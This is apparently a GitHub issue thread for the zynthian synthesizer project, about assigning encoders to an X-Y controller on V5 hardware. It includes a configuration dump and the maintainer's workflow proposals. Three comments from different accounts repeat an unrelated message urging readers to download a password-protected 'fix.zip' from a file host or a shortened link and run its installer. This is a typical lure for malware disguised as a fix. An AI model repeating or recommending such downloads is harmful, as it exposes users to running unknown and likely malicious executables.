### ISSUE TITLE
Can't assign required controllers to X-Y in V5

### ISSUE THREAD

**Issue by riban-bw** [zynthian/zynthian-issue-tracking#1179]
# Describe the issue
Bold pressing a V5 encoder will show a menu that allows assiging X-Y mapping but it only assigns the current and next encoder and only if the seletion is not the last one.
# To Reproduce
## Steps to reproduce the behavior:
1. Go to chain control view
2. Bold press an encoder
3. Select X-Y
 ## Expected behaviour
Able to select and assign any other encoder to the Y axis.
## Actual behaviour
Only subsequent encoders on same page can be assigned.
# Additional context
This may benefit from a workflow like:

- Option menu to select first controller
- Option menu to select second encoder

# Configuration
## Hardware
```
Raspberry Pi 4 Model B Rev 1.5
Audio: V5 ADAC
Display: MIPI DSI 800x480 (inverted)
Wiring: V5
I2C: MCP23017@0x20, MCP23017@0x21
Profile: v5
```
## System
```
Debian GNU/Linux 12 (bookworm)
Build Date: 2024-02-01
Memory: 31% (1212M/3792M)
SD Card: 95% (26G/29G)
Temperature: 40.9ºC
Overclock: Maximum
```
## MIDI & UI
```
Tuning: 440 Hz
Master Channel: Off
Preload Presets: Off
ZS3 (SubSnapShots): On
Power Save: 10 minutes
Audio Levels on Snapshots: On
```
## Software
```
zyncoder: oram (62626a8) 
zynthian-ui: oram (1ba0568)
zynthian-sys: oram (c4f12ea)
zynthian-data: oram (e222e11)
zynthian-webconf: oram (b70f1bc)
```

**Comment by miniMuggle** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by riban-bw** [comment]
I suggest a consistent (and I believe better) method of accessing X-Y.

- Bold press control / knob to access control options menu
- Select "Set X control" - x-axis is assigned and return to chain control view
- Bold press control / knob to access control options menu
- Select "Set Y control" - y-axis is assigned and return to chain control view
- Access chain options menu
- Select "X-Y View" - the X-Y view shows with the currently assigned controls (see #171)
- Use BACK or triple tap to exit X-Y

The X & Y controller assignment for each chain would be saved in ZS3. This allows recall of configuration for performance.

I feel this is intutive and allows better UX.

**Comment by riban-bw** [comment]
Thinking further on this, I think it may be better to have only one global X-Y configuration per ZS3 rather than a config per chain. You could assign the X and Y axis to any controllers in any engine which would be saved in the ZS3. I prefer this option. It gives more flexibility to configuration and it seems most unlikely that you want more than one X-Y config per ZS3. Just add another ZS3 if you want a different config.
